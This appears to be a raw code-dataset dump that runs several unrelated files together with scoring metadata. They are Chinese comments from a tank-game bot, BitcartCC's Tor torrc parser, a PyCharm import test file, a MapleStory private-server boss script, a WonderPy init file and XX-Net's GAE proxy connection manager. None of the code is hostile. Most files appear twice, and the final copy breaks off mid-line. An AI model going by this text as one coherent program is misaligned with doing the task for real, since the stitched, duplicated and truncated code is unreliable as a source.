打到队友当然不安全! # 模拟本方行为 # # TODO: # 只模拟一个坦克的行为并不能反映真实的世界,因为敌方这回合很有可能射击 # 那么下回合它就无法射击,就不应该造成威胁 # # 任意移动行为 # 模拟敌方行为 # 对方下一步不可能移动到我即将摧毁的 field 上,所以这种情况是安全的 # 敌方原地不动或移动一步后,能够看到该坦克 # 还可以尝试回避 # 无法回避,危险行为 # 默认安全? 用这个函数提交决策 如果这个决策被判定是危险的,那么将提交 instead 行为 下回合接近某个敌人是否安全? --------------------------- 用于双方相遇 (且敌人无法射击),我方试图接近他的时候 这种情况下需要判断周围是否有敌人攻击我 # 可以射击,必定不安全,还是检查一下 # 找到另一个敌人 # 输了就不算 # 排除目前这个敌人 # 本回合不能攻击的不算 # 开始模拟,反正就一架坦克 # 我方坦克将出现在它旁边,并且它可以射击 # 可能被偷袭 # 此处判断不会被偷袭 # 不能移动,当然不安全 ... 在不考虑和自己重叠的敌人的情况下,判断采用移动的方法打破重叠是否安全 此时将敌人视为不会攻击,然后考虑另一个敌人的攻击 # 还是检查一下,不要出错 # 如果移动后有两个敌人在旁边,那么不能前进 5cd3e7a786d50d05a0082a5d #------------------------------------------- #self._riskyEnemy = ?? # 跳过已经输了的 # 另一个对手不能射击 # 不考虑和自己重叠的这个坦克 # 提交模拟 # 不安全,可能有风险 # 否则是安全的 当两者均没有炮弹,然后中间相差一格时,冲上去和敌方坦克重叠是否合适? WARNING: ------------ 1. 该函数仅适用于两者间移动路劲长度为 2 的情况,其他情况不适用 2. 该函数判定为 False 的情况,表示适合堵路,不适合重叠,但是判定为 False 并不表示一定要冲上去重叠,而是要根据当时的具体情况来判断 # # 检查自己所处的位置是否是敌人必经之路 # 如果是,那么就堵路 # # 将我方坦克设为 Steel # 不大可能,但是检查一下 # 直接就走不通了,当然非常好啦 # 认为需要多打破一个以上土墙的情况叫做原路 # @override 预处理: ------------------ - 清除所有旧有状态 - 清除可能的风险敌人 - 统一处理回复格式 注意: ------------------ - 申明为 _make_decision 过程中的缓存变量,必须在下一次决策前预先清除 # 先清除所有的状态 # 清楚所有缓存的风险敌人 # 说明没有回复团队信号 # 缓存决策 # 先保持着 这个状态 #{ END 'player.py' }# #{ BEGIN 'team.py' }# # 实际上不可能碰到 team 不能决策的情况,否则找谁决策呀 ... # 团队记忆 # 历史行为 botzone 将 data 传入给 team 恢复记忆 # [ set(), set() ] 每轮的状态 # [ set(), set() ] 已有的标记 # [ Route, Route ] 由 botzone input 获得的过去动作,可以将其视为一种记忆 设置对手团队 Input: - team Tank2Team 在曾经的一定回合里,某玩家是否拥有某个状态 Input: - player Player 玩家实例,不一定是本队的 - status int 状态编号 - turns int 向前检查多少回合 # TODO: # 还需要判断回合数是否超出一已知回合? # 逆序 # 可能 allStatus 为空 最近的几回合内是否曾经拥有过某个状态 获得一个玩家的操纵坦克的历史行为 Input: - player Player 玩家实例,不一定是本队的 - back int ( >= 1) 前第几回合的历史记录,例如 back = 1 表示前一回合 团队决策 Return: - actions [int, int] 0, 1 号玩家的决策 # 假装先让对方以自己的想法决策 #------------------------------- # 分析对方的行为,可以对下一步的行为作出指导 # # for func in [ find_all_routes_for_shoot, find_all_routes_for_move ]: # if not hasattr(func, "__wrapped__"): # continue # _wrapper = func.__wrapped__ # if hasattr(_wrapper, "__memory__"): # _memory = _wrapper.__memory__ # debug_print(_memory.keys(), len(_memory)) # debug_print(sys.getsizeof(_memory)) # @override 如果有的玩家无法决策,那么就将其行为设为 Action.STAY 事实上这种情况是不应该出现的,但是为了防止出错,此处对决策结果进行检查 #{ END 'team.py' }# #{ BEGIN 'stream.py' }# #{ END 'stream.py' }# #{ BEGIN 'botzone.py' }# # 对方的决策 # 己方的决策 解析输入信息 Input: - stream TextIOWrapper 输入流对象,必须实现 read 方法 输出结果 Input: - stream TextIOWrapper 输出流对象,必须实现 write 方法 - response dict Bot 此回合的输出信息 - debug dict/str 调试信息,将被写入log,最大长度为1KB - data dict Bot 此回合的保存信息,将在下回合输入 - globaldata dict Bot 的全局保存信息,将会在下回合输入, 对局结束后也会保留,下次对局可以继续利用 # 由 requests, responses 解析而来的历史动作记录 解析 requests 中存在有某种类型 field 的坐标 Input: - binary list 某种类型 field 的 binary 标记 Yield: - (x, y) tuple(int, int) 这个坐标上存在该类型 field # 带 header # 此时 header 被去掉 # { (side, id): [Action] } 获得某一坦克的历史决策 # 没有记录则抛出 [] #{ END 'botzone.py' }# #{ BEGIN 'main.py' }# # Singleton # Singleton # 这个模式下 map 对象会复用,首先需要重置 #{ END 'main.py' }#
2.000118
2
api/ext/tor.py
MrNaif2018/bitcart
48
6628981
import ipaddress import json import os from dataclasses import asdict as dataclass_asdict from dataclasses import dataclass from typing import Optional from api import settings, utils from api.logger import get_logger logger = get_logger(__name__) REDIS_KEY = "bitcartcc_tor_ext" @dataclass(frozen=True) class PortDefinition: virtual_port: int ip: str port: int @dataclass class HiddenService: name: str directory: str hostname: str port_definition: Optional[PortDefinition] = None def is_onion(host): return host.lower().endswith(".onion") def parse_hidden_service(line): if not line.startswith("HiddenServiceDir "): return parts = line.split() if len(parts) != 2: return return parts[1].strip() def parse_hidden_service_port(line): if not line.startswith("HiddenServicePort "): return parts = line.split() if len(parts) != 3: return try: virtual_port = int(parts[1].strip()) address_port = parts[2].strip().split(":") if len(address_port) != 2: return port = int(address_port[1]) ip_address = str(ipaddress.ip_address(address_port[0].strip())) return PortDefinition(virtual_port, ip_address, port) except ValueError: return # all parsing exceptions are ValueError def get_hostname(service_dir, log=True): path = os.path.join(service_dir, "hostname") try: with open(path) as f: return f"http://{f.readline().strip()}" except OSError: if log: logger.warning(f"Hostname file missing for service {get_service_name(service_dir)}") return def get_service_name(service_dir): return os.path.basename(service_dir).replace("-", " ") def parse_torrc(torrc, log=True): if not torrc: return [] try: with open(torrc) as f: lines = f.readlines() except OSError: if log: logger.warning("Torrc file not found") return [] services = [] for line in lines: line = line.strip() hidden_service = parse_hidden_service(line) hidden_service_port = parse_hidden_service_port(line) if hidden_service: hidden_service = HiddenService( get_service_name(hidden_service), hidden_service, get_hostname(hidden_service, log=log), ) services.append(hidden_service) elif hidden_service_port and services: services[-1].port_definition = hidden_service_port return services async def refresh(log=True): # pragma: no cover: used in production only async with utils.redis.wait_for_redis(): services = parse_torrc(settings.settings.torrc_file, log=log) services_dict = {service.name: dataclass_asdict(service) for service in services} anonymous_services_dict = {service.name: {"name": service.name, "hostname": service.hostname} for service in services} onion_host = services_dict.get("BitcartCC Merchants API", "") if onion_host: onion_host = onion_host["hostname"] or "" await settings.settings.redis_pool.hset( REDIS_KEY, mapping={ "onion_host": onion_host, "services_dict": json.dumps(services_dict), "anonymous_services_dict": json.dumps(anonymous_services_dict), }, ) async def get_data(key, default=None, json_decode=False): async with utils.redis.wait_for_redis(): data = await settings.settings.redis_pool.hget(REDIS_KEY, key) data = json.loads(data) if json_decode and data else data return data if data else default
import ipaddress import json import os from dataclasses import asdict as dataclass_asdict from dataclasses import dataclass from typing import Optional from api import settings, utils from api.logger import get_logger logger = get_logger(__name__) REDIS_KEY = "bitcartcc_tor_ext" @dataclass(frozen=True) class PortDefinition: virtual_port: int ip: str port: int @dataclass class HiddenService: name: str directory: str hostname: str port_definition: Optional[PortDefinition] = None def is_onion(host): return host.lower().endswith(".onion") def parse_hidden_service(line): if not line.startswith("HiddenServiceDir "): return parts = line.split() if len(parts) != 2: return return parts[1].strip() def parse_hidden_service_port(line): if not line.startswith("HiddenServicePort "): return parts = line.split() if len(parts) != 3: return try: virtual_port = int(parts[1].strip()) address_port = parts[2].strip().split(":") if len(address_port) != 2: return port = int(address_port[1]) ip_address = str(ipaddress.ip_address(address_port[0].strip())) return PortDefinition(virtual_port, ip_address, port) except ValueError: return # all parsing exceptions are ValueError def get_hostname(service_dir, log=True): path = os.path.join(service_dir, "hostname") try: with open(path) as f: return f"http://{f.readline().strip()}" except OSError: if log: logger.warning(f"Hostname file missing for service {get_service_name(service_dir)}") return def get_service_name(service_dir): return os.path.basename(service_dir).replace("-", " ") def parse_torrc(torrc, log=True): if not torrc: return [] try: with open(torrc) as f: lines = f.readlines() except OSError: if log: logger.warning("Torrc file not found") return [] services = [] for line in lines: line = line.strip() hidden_service = parse_hidden_service(line) hidden_service_port = parse_hidden_service_port(line) if hidden_service: hidden_service = HiddenService( get_service_name(hidden_service), hidden_service, get_hostname(hidden_service, log=log), ) services.append(hidden_service) elif hidden_service_port and services: services[-1].port_definition = hidden_service_port return services async def refresh(log=True): # pragma: no cover: used in production only async with utils.redis.wait_for_redis(): services = parse_torrc(settings.settings.torrc_file, log=log) services_dict = {service.name: dataclass_asdict(service) for service in services} anonymous_services_dict = {service.name: {"name": service.name, "hostname": service.hostname} for service in services} onion_host = services_dict.get("BitcartCC Merchants API", "") if onion_host: onion_host = onion_host["hostname"] or "" await settings.settings.redis_pool.hset( REDIS_KEY, mapping={ "onion_host": onion_host, "services_dict": json.dumps(services_dict), "anonymous_services_dict": json.dumps(anonymous_services_dict), }, ) async def get_data(key, default=None, json_decode=False): async with utils.redis.wait_for_redis(): data = await settings.settings.redis_pool.hget(REDIS_KEY, key) data = json.loads(data) if json_decode and data else data return data if data else default
en
0.743497
# all parsing exceptions are ValueError # pragma: no cover: used in production only
2.448224
2
python/testData/optimizeImports/commentsInsideParenthesesInCombinedFromImports.py
jnthn/intellij-community
2
6628982
<gh_stars>1-10 from datetime import (timedelta as name, # bcc time as bbb) # cbc from datetime import (datetime as ccc) # abc print(name, bbb, ccc)
from datetime import (timedelta as name, # bcc time as bbb) # cbc from datetime import (datetime as ccc) # abc print(name, bbb, ccc)
en
0.763149
# bcc # cbc # abc
2.06236
2
scripts/field/first_DemianNormal1.py
Snewmy/swordie
9
6628983
<gh_stars>1-10 from net.swordie.ms.constants import BossConstants from net.swordie.ms.life.mob.boss.demian import Demian from net.swordie.ms.connection.packet import DemianFieldPacket from net.swordie.ms.life.mob.boss.demian.sword import DemianFlyingSword from net.swordie.ms.connection.packet import FieldPacket field = chr.getField() instance = chr.getInstance() init = instance.initialised if not init: instance.initialised = True mob = sm.spawnMob(BossConstants.DEMIAN_NORMAL_TEMPLATE_ID, 895, 16, False, BossConstants.DEMIAN_HP) # spawn Demian sm.addEvent(Demian.stigmaIncinerateObjectTimer(field)) # start Pillar sword = DemianFlyingSword.createDemianFlyingSword(chr, mob) field.spawnLife(sword, None) # create sword.startPath() sword.target() for iChr in instance.getChars(): iSM = iChr.getScriptManager() iChr.write(FieldPacket.giveSpecialSkillBar(BossConstants.BRAND_OF_SACRIFICE)) iChr.write(DemianFieldPacket.corruptionChange(False, 0)) # show corruption window iSM.addEvent(Demian.increaseStigmaPassiveTimer(iChr)) # start stigma timer on corruption window while sm.hasMobsInField(): sm.waitForMobDeath() sm.warp(350160240)
from net.swordie.ms.constants import BossConstants from net.swordie.ms.life.mob.boss.demian import Demian from net.swordie.ms.connection.packet import DemianFieldPacket from net.swordie.ms.life.mob.boss.demian.sword import DemianFlyingSword from net.swordie.ms.connection.packet import FieldPacket field = chr.getField() instance = chr.getInstance() init = instance.initialised if not init: instance.initialised = True mob = sm.spawnMob(BossConstants.DEMIAN_NORMAL_TEMPLATE_ID, 895, 16, False, BossConstants.DEMIAN_HP) # spawn Demian sm.addEvent(Demian.stigmaIncinerateObjectTimer(field)) # start Pillar sword = DemianFlyingSword.createDemianFlyingSword(chr, mob) field.spawnLife(sword, None) # create sword.startPath() sword.target() for iChr in instance.getChars(): iSM = iChr.getScriptManager() iChr.write(FieldPacket.giveSpecialSkillBar(BossConstants.BRAND_OF_SACRIFICE)) iChr.write(DemianFieldPacket.corruptionChange(False, 0)) # show corruption window iSM.addEvent(Demian.increaseStigmaPassiveTimer(iChr)) # start stigma timer on corruption window while sm.hasMobsInField(): sm.waitForMobDeath() sm.warp(350160240)
en
0.619358
# spawn Demian # start Pillar # create # show corruption window # start stigma timer on corruption window
2.006403
2
WonderPy/__init__.py
avrabe/WonderPy
1
6628984
<reponame>avrabe/WonderPy from . import components # noqa from . import core # noqa from . import util # noqa
from . import components # noqa from . import core # noqa from . import util # noqa
uz
0.446344
# noqa # noqa # noqa
1.026277
1
gae_proxy/local/connect_manager.py
vanish87/XX-Net
1
6628985
#!/usr/bin/env python # coding:utf-8 import os import binascii import time import socket import struct import threading import operator import httplib import socks from xlog import getLogger xlog = getLogger("gae_proxy") current_path = os.path.dirname(os.path.abspath(__file__)) import OpenSSL SSLError = OpenSSL.SSL.WantReadError from config import config def load_proxy_config(): if config.PROXY_ENABLE: if config.PROXY_TYPE == "HTTP": proxy_type = socks.HTTP elif config.PROXY_TYPE == "SOCKS4": proxy_type = socks.SOCKS4 elif config.PROXY_TYPE == "SOCKS5": proxy_type = socks.SOCKS5 else: xlog.error("proxy type %s unknown, disable proxy", config.PROXY_TYPE) config.PROXY_ENABLE = 0 return socks.set_default_proxy(proxy_type, config.PROXY_HOST, config.PROXY_PORT, config.PROXY_USER, config.PROXY_PASSWD) load_proxy_config() from google_ip import google_ip from appids_manager import appid_manager from openssl_wrap import SSLConnection NetWorkIOError = (socket.error, SSLError, OpenSSL.SSL.Error, OSError) g_cacertfile = os.path.join(current_path, "cacert.pem") import connect_control class Connect_pool(): def __init__(self): self.pool_lock = threading.Lock() self.not_empty = threading.Condition(self.pool_lock) self.pool = {} def qsize(self): return len(self.pool) def put(self, item): handshake_time, sock = item self.not_empty.acquire() try: self.pool[sock] = handshake_time self.not_empty.notify() finally: self.not_empty.release() def get(self, block=True, timeout=None): self.not_empty.acquire() try: if not block: if not self.qsize(): return None elif timeout is None: while not self.qsize(): self.not_empty.wait() elif timeout < 0: raise ValueError("'timeout' must be a positive number") else: end_time = time.time() + timeout while not self.qsize(): remaining = end_time - time.time() if remaining <= 0.0: return None self.not_empty.wait(remaining) item = self._get() return item finally: self.not_empty.release() def get_nowait(self): return self.get(block=False) def _get(self): fastest_time = 9999 fastest_sock = None for sock in self.pool: ip = sock.ip #if not google_ip.is_traffic_quota_allow(ip): # continue time = self.pool[sock] if time < fastest_time or not fastest_sock: fastest_time = time fastest_sock = sock self.pool.pop(fastest_sock) return (fastest_time, fastest_sock) def get_slowest(self): self.not_empty.acquire() try: if not self.qsize(): raise ValueError("no item") slowest_handshake_time = 0 slowest_sock = None for sock in self.pool: handshake_time = self.pool[sock] if handshake_time > slowest_handshake_time: slowest_handshake_time = handshake_time slowest_sock = sock self.pool.pop(slowest_sock) return (slowest_handshake_time, slowest_sock) finally: self.not_empty.release() def get_need_keep_alive(self, maxtime=200): return_list = [] self.pool_lock.acquire() try: pool = tuple(self.pool) for sock in pool: inactive_time = time.time() -sock.last_use_time #logging.debug("inactive_time:%d", inactive_time * 1000) if inactive_time >= maxtime: return_list.append(sock) del self.pool[sock] return return_list finally: self.pool_lock.release() def clear(self): self.pool_lock.acquire() try: for sock in self.pool: sock.close() self.pool = {} finally: self.pool_lock.release() def to_string(self): str = '' self.pool_lock.acquire() try: pool = sorted(self.pool.items(), key=operator.itemgetter(1)) i = 0 for item in pool: sock,t = item str += "%d \t %s handshake:%d not_active_time:%d\r\n" % (i, sock.ip, t, time.time() -sock.last_use_time) i += 1 finally: self.pool_lock.release() return str class Https_connection_manager(object): thread_num_lock = threading.Lock() def __init__(self): # http://docs.python.org/dev/library/ssl.html # http://blog.ivanristic.com/2009/07/examples-of-the-information-collected-from-ssl-handshakes.html # http://src.chromium.org/svn/trunk/src/net/third_party/nss/ssl/sslenum.c # openssl s_server -accept 443 -key CA.crt -cert CA.crt # ref: http://vincent.bernat.im/en/blog/2011-ssl-session-reuse-rfc5077.html self.openssl_context = SSLConnection.context_builder(ca_certs=g_cacertfile) self.openssl_context.set_session_id(binascii.b2a_hex(os.urandom(10))) if hasattr(OpenSSL.SSL, 'SESS_CACHE_BOTH'): self.openssl_context.set_session_cache_mode(OpenSSL.SSL.SESS_CACHE_BOTH) self.timeout = 4 self.max_timeout = 15 self.thread_num = 0 self.load_config() if self.keep_alive: p = threading.Thread(target = self.keep_alive_thread) p.daemon = True p.start() p = threading.Thread(target = self.create_connection_daemon) p.daemon = True p.start() def load_config(self): self.max_thread_num = config.CONFIG.getint("connect_manager", "https_max_connect_thread") self.connection_pool_max_num = config.CONFIG.getint("connect_manager", "https_connection_pool_max") self.connection_pool_min_num = config.CONFIG.getint("connect_manager", "https_connection_pool_min") self.keep_alive = config.CONFIG.getint("connect_manager", "https_keep_alive") self.new_conn_pool = Connect_pool() self.gae_conn_pool = Connect_pool() self.host_conn_pool = {} def clean_old_connection(self): self.gae_conn_pool.clear() def head_request(self, ssl_sock): if ssl_sock.host == '': ssl_sock.appid = appid_manager.get_appid() if not ssl_sock.appid: xlog.error("no appid can use") return False host = ssl_sock.appid + ".appspot.com" ssl_sock.host = host else: host = ssl_sock.host # public appid don't keep alive, for quota limit. if ssl_sock.appid.startswith("xxnet-") and ssl_sock.appid[7:].isdigit(): #logging.info("public appid don't keep alive") #self.keep_alive = 0 return False #logging.debug("head request %s", host) request_data = 'HEAD /_gh/ HTTP/1.1\r\nHost: %s\r\n\r\n' % host response = None try: ssl_sock.settimeout(10) ssl_sock._sock.settimeout(10) data = request_data.encode() ret = ssl_sock.send(data) if ret != len(data): xlog.warn("head send len:%d %d", ret, len(data)) response = httplib.HTTPResponse(ssl_sock, buffering=True) response.begin() status = response.status if status != 200: xlog.debug("app head fail status:%d", status) raise Exception("app check fail %r" % status) return True except httplib.BadStatusLine as e: inactive_time = time.time() - ssl_sock.last_use_time xlog.debug("%s keep alive fail, time:%d", ssl_sock.ip, inactive_time) return False except Exception as e: xlog.warn("%s head %s request fail:%r", ssl_sock.ip, ssl_sock.appid, e) return False finally: if response: response.close() def keep_alive_worker(self, sock): call_time = time.time() if self.head_request(sock): self.save_ssl_connection_for_reuse(sock, call_time=call_time) else: google_ip.report_connect_closed(sock.ip, "HEAD") sock.close() #self.create_more_connection() def start_keep_alive(self, sock): work_thread = threading.Thread(target=self.keep_alive_worker, args=(sock,)) work_thread.start() def keep_alive_thread(self): while self.keep_alive and connect_control.keep_running: if not connect_control.is_active(): time.sleep(1) continue new_list = self.new_conn_pool.get_need_keep_alive(maxtime=self.keep_alive-3) old_list = self.gae_conn_pool.get_need_keep_alive(maxtime=self.keep_alive-3) to_keep_live_list = new_list + old_list for ssl_sock in to_keep_live_list: inactive_time = time.time() - ssl_sock.last_use_time if inactive_time > self.keep_alive: google_ip.report_connect_closed(ssl_sock.ip, "alive_timeout") ssl_sock.close() else: self.start_keep_alive(ssl_sock) for host in self.host_conn_pool: host_list = self.host_conn_pool[host].get_need_keep_alive(maxtime=self.keep_alive-3) for ssl_sock in host_list: google_ip.report_connect_closed(ssl_sock.ip, "host pool alive_timeout") ssl_sock.close() #self.create_more_connection() time.sleep(1) def save_ssl_connection_for_reuse(self, ssl_sock, host=None, call_time=0): if call_time: ssl_sock.last_use_time = call_time else: ssl_sock.last_use_time = time.time() if host: if host not in self.host_conn_pool: self.host_conn_pool[host] = Connect_pool() self.host_conn_pool[host].put( (ssl_sock.handshake_time, ssl_sock) ) else: self.gae_conn_pool.put( (ssl_sock.handshake_time, ssl_sock) ) while self.gae_conn_pool.qsize() > self.connection_pool_max_num: handshake_time, ssl_sock = self.gae_conn_pool.get_slowest() google_ip.report_connect_closed(ssl_sock.ip, "slowest %d" % ssl_sock.handshake_time) ssl_sock.close() def create_more_connection_worker(self): need_conn_num = self.connection_pool_min_num - self.new_conn_pool.qsize() target_thread_num = min(self.max_thread_num, need_conn_num) while self.thread_num < target_thread_num and self.new_conn_pool.qsize() < self.connection_pool_min_num: if not connect_control.allow_connect(): break self.thread_num_lock.acquire() self.thread_num += 1 self.thread_num_lock.release() p = threading.Thread(target=self.connect_thread) p.start() time.sleep(0.3) def create_more_connection(self): p = threading.Thread(target=self.create_more_connection_worker) p.start() def create_connection_daemon(self): connect_start_num = 0 while connect_control.keep_running: time.sleep(0.1) if not connect_control.allow_connect(): time.sleep(5) continue if self.thread_num > self.max_thread_num: continue target_conn_num = (1 - (connect_control.inactive_time()/(10*60))) * self.connection_pool_min_num if self.new_conn_pool.qsize() > target_conn_num: time.sleep(1) continue self.thread_num_lock.acquire() self.thread_num += 1 self.thread_num_lock.release() p = threading.Thread(target=self.connect_process) p.start() connect_start_num += 1 if connect_start_num > 10: time.sleep(5) connect_start_num = 0 def connect_process(self): try: ip_str = google_ip.get_gws_ip() if not ip_str: time.sleep(60) xlog.warning("no enough ip") return port = 443 #logging.debug("create ssl conn %s", ip_str) ssl_sock = self._create_ssl_connection( (ip_str, port) ) if ssl_sock: ssl_sock.last_use_time = time.time() self.new_conn_pool.put((ssl_sock.handshake_time, ssl_sock)) finally: self.thread_num_lock.acquire() self.thread_num -= 1 self.thread_num_lock.release() def connect_thread(self, sleep_time=0): time.sleep(sleep_time) try: while self.new_conn_pool.qsize() < self.connection_pool_min_num: if self.new_conn_pool.qsize() >= self.connection_pool_min_num: #xlog.debug("get enough conn") break ip_str = google_ip.get_gws_ip() if not ip_str: time.sleep(60) xlog.warning("no enough ip") break port = 443 #logging.debug("create ssl conn %s", ip_str) ssl_sock = self._create_ssl_connection( (ip_str, port) ) if ssl_sock: ssl_sock.last_use_time = time.time() self.new_conn_pool.put((ssl_sock.handshake_time, ssl_sock)) elif not connect_control.allow_connect(): break time.sleep(1) finally: self.thread_num_lock.acquire() self.thread_num -= 1 self.thread_num_lock.release() def _create_ssl_connection(self, ip_port): if not connect_control.allow_connect(): time.sleep(10) return False sock = None ssl_sock = None ip = ip_port[0] connect_control.start_connect_register(high_prior=True) connect_time = 0 handshake_time = 0 time_begin = time.time() try: if config.PROXY_ENABLE: sock = socks.socksocket(socket.AF_INET if ':' not in ip else socket.AF_INET6) else: sock = socket.socket(socket.AF_INET if ':' not in ip else socket.AF_INET6) # set reuseaddr option to avoid 10048 socket error sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) # set struct linger{l_onoff=1,l_linger=0} to avoid 10048 socket error sock.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, struct.pack('ii', 1, 0)) # resize socket recv buffer 8K->32K to improve browser releated application performance sock.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 32*1024) # disable negal algorithm to send http request quickly. sock.setsockopt(socket.SOL_TCP, socket.TCP_NODELAY, True) # set a short timeout to trigger timeout retry more quickly. sock.settimeout(self.timeout) ssl_sock = SSLConnection(self.openssl_context, sock, ip, google_ip.ssl_closed) ssl_sock.set_connect_state() ssl_sock.connect(ip_port) time_connected = time.time() ssl_sock.do_handshake() time_handshaked = time.time() connect_time = int((time_connected - time_begin) * 1000) handshake_time = int((time_handshaked - time_connected) * 1000) google_ip.update_ip(ip, handshake_time) xlog.debug("create_ssl update ip:%s time:%d", ip, handshake_time) ssl_sock.fd = sock.fileno() ssl_sock.create_time = time_begin ssl_sock.received_size = 0 ssl_sock.load = 0 ssl_sock.handshake_time = handshake_time ssl_sock.host = '' def verify_SSL_certificate_issuer(ssl_sock): cert = ssl_sock.get_peer_certificate() if not cert: #google_ip.report_bad_ip(ssl_sock.ip) #connect_control.fall_into_honeypot() raise socket.error(' certficate is none') issuer_commonname = next((v for k, v in cert.get_issuer().get_components() if k == 'CN'), '') if not issuer_commonname.startswith('Google'): google_ip.report_connect_fail(ip, force_remove=True) raise socket.error(' certficate is issued by %r, not Google' % ( issuer_commonname)) verify_SSL_certificate_issuer(ssl_sock) connect_control.report_connect_success() return ssl_sock except Exception as e: time_cost = time.time() - time_begin if time_cost < self.timeout - 1: xlog.debug("connect %s fail:%s cost:%d h:%d", ip, e, time_cost * 1000, handshake_time) else: xlog.debug("%s fail:%r", ip, e) google_ip.report_connect_fail(ip) connect_control.report_connect_fail() if ssl_sock: ssl_sock.close() if sock: sock.close() return False finally: connect_control.end_connect_register(high_prior=True) def get_ssl_connection(self, host=''): ssl_sock = None if host: if host in self.host_conn_pool: while True: ret = self.host_conn_pool[host].get_nowait() if ret: handshake_time, ssl_sock = ret else: ssl_sock = None break if time.time() - ssl_sock.last_use_time < self.keep_alive+1: xlog.debug("host_conn_pool %s get:%s handshake:%d", host, ssl_sock.ip, handshake_time) break else: google_ip.report_connect_closed(ssl_sock.ip, "get_timeout") ssl_sock.close() continue else: while True: ret = self.gae_conn_pool.get_nowait() if ret: handshake_time, ssl_sock = ret else: ssl_sock = None break if time.time() - ssl_sock.last_use_time < self.keep_alive+1: xlog.debug("ssl_pool.get:%s handshake:%d", ssl_sock.ip, handshake_time) break else: google_ip.report_connect_closed(ssl_sock.ip, "get_timeout") ssl_sock.close() continue self.create_more_connection() if ssl_sock: return ssl_sock else: ret = self.new_conn_pool.get(True, self.max_timeout) if ret: handshake_time, ssl_sock = ret return ssl_sock else: xlog.debug("create ssl timeout fail.") return None def get_new_ssl(self): self.create_more_connection() ret = self.new_conn_pool.get(True, self.max_timeout) if ret: handshake_time, ssl_sock = ret return ssl_sock else: xlog.debug("get_new_ssl timeout fail.") return None https_manager = Https_connection_manager()
#!/usr/bin/env python # coding:utf-8 import os import binascii import time import socket import struct import threading import operator import httplib import socks from xlog import getLogger xlog = getLogger("gae_proxy") current_path = os.path.dirname(os.path.abspath(__file__)) import OpenSSL SSLError = OpenSSL.SSL.WantReadError from config import config def load_proxy_config(): if config.PROXY_ENABLE: if config.PROXY_TYPE == "HTTP": proxy_type = socks.HTTP elif config.PROXY_TYPE == "SOCKS4": proxy_type = socks.SOCKS4 elif config.PROXY_TYPE == "SOCKS5": proxy_type = socks.SOCKS5 else: xlog.error("proxy type %s unknown, disable proxy", config.PROXY_TYPE) config.PROXY_ENABLE = 0 return socks.set_default_proxy(proxy_type, config.PROXY_HOST, config.PROXY_PORT, config.PROXY_USER, config.PROXY_PASSWD) load_proxy_config() from google_ip import google_ip from appids_manager import appid_manager from openssl_wrap import SSLConnection NetWorkIOError = (socket.error, SSLError, OpenSSL.SSL.Error, OSError) g_cacertfile = os.path.join(current_path, "cacert.pem") import connect_control class Connect_pool(): def __init__(self): self.pool_lock = threading.Lock() self.not_empty = threading.Condition(self.pool_lock) self.pool = {} def qsize(self): return len(self.pool) def put(self, item): handshake_time, sock = item self.not_empty.acquire() try: self.pool[sock] = handshake_time self.not_empty.notify() finally: self.not_empty.release() def get(self, block=True, timeout=None): self.not_empty.acquire() try: if not block: if not self.qsize(): return None elif timeout is None: while not self.qsize(): self.not_empty.wait() elif timeout < 0: raise ValueError("'timeout' must be a positive number") else: end_time = time.time() + timeout while not self.qsize(): remaining = end_time - time.time() if remaining <= 0.0: return None self.not_empty.wait(remaining) item = self._get() return item finally: self.not_empty.release() def get_nowait(self): return self.get(block=False) def _get(self): fastest_time = 9999 fastest_sock = None for sock in self.pool: ip = sock.ip #if not google_ip.is_traffic_quota_allow(ip): # continue time = self.pool[sock] if time < fastest_time or not fastest_sock: fastest_time = time fastest_sock = sock self.pool.pop(fastest_sock) return (fastest_time, fastest_sock) def get_slowest(self): self.not_empty.acquire() try: if not self.qsize(): raise ValueError("no item") slowest_handshake_time = 0 slowest_sock = None for sock in self.pool: handshake_time = self.pool[sock] if handshake_time > slowest_handshake_time: slowest_handshake_time = handshake_time slowest_sock = sock self.pool.pop(slowest_sock) return (slowest_handshake_time, slowest_sock) finally: self.not_empty.release() def get_need_keep_alive(self, maxtime=200): return_list = [] self.pool_lock.acquire() try: pool = tuple(self.pool) for sock in pool: inactive_time = time.time() -sock.last_use_time #logging.debug("inactive_time:%d", inactive_time * 1000) if inactive_time >= maxtime: return_list.append(sock) del self.pool[sock] return return_list finally: self.pool_lock.release() def clear(self): self.pool_lock.acquire() try: for sock in self.pool: sock.close() self.pool = {} finally: self.pool_lock.release() def to_string(self): str = '' self.pool_lock.acquire() try: pool = sorted(self.pool.items(), key=operator.itemgetter(1)) i = 0 for item in pool: sock,t = item str += "%d \t %s handshake:%d not_active_time:%d\r\n" % (i, sock.ip, t, time.time() -sock.last_use_time) i += 1 finally: self.pool_lock.release() return str class Https_connection_manager(object): thread_num_lock = threading.Lock() def __init__(self): # http://docs.python.org/dev/library/ssl.html # http://blog.ivanristic.com/2009/07/examples-of-the-information-collected-from-ssl-handshakes.html # http://src.chromium.org/svn/trunk/src/net/third_party/nss/ssl/sslenum.c # openssl s_server -accept 443 -key CA.crt -cert CA.crt # ref: http://vincent.bernat.im/en/blog/2011-ssl-session-reuse-rfc5077.html self.openssl_context = SSLConnection.context_builder(ca_certs=g_cacertfile) self.openssl_context.set_session_id(binascii.b2a_hex(os.urandom(10))) if hasattr(OpenSSL.SSL, 'SESS_CACHE_BOTH'): self.openssl_context.set_session_cache_mode(OpenSSL.SSL.SESS_CACHE_BOTH) self.timeout = 4 self.max_timeout = 15 self.thread_num = 0 self.load_config() if self.keep_alive: p = threading.Thread(target = self.keep_alive_thread) p.daemon = True p.start() p = threading.Thread(target = self.create_connection_daemon) p.daemon = True p.start() def load_config(self): self.max_thread_num = config.CONFIG.getint("connect_manager", "https_max_connect_thread") self.connection_pool_max_num = config.CONFIG.getint("connect_manager", "https_connection_pool_max") self.connection_pool_min_num = config.CONFIG.getint("connect_manager", "https_connection_pool_min") self.keep_alive = config.CONFIG.getint("connect_manager", "https_keep_alive") self.new_conn_pool = Connect_pool() self.gae_conn_pool = Connect_pool() self.host_conn_pool = {} def clean_old_connection(self): self.gae_conn_pool.clear() def head_request(self, ssl_sock): if ssl_sock.host == '': ssl_sock.appid = appid_manager.get_appid() if not ssl_sock.appid: xlog.error("no appid can use") return False host = ssl_sock.appid + ".appspot.com" ssl_sock.host = host else: host = ssl_sock.host # public appid don't keep alive, for quota limit. if ssl_sock.appid.startswith("xxnet-") and ssl_sock.appid[7:].isdigit(): #logging.info("public appid don't keep alive") #self.keep_alive = 0 return False #logging.debug("head 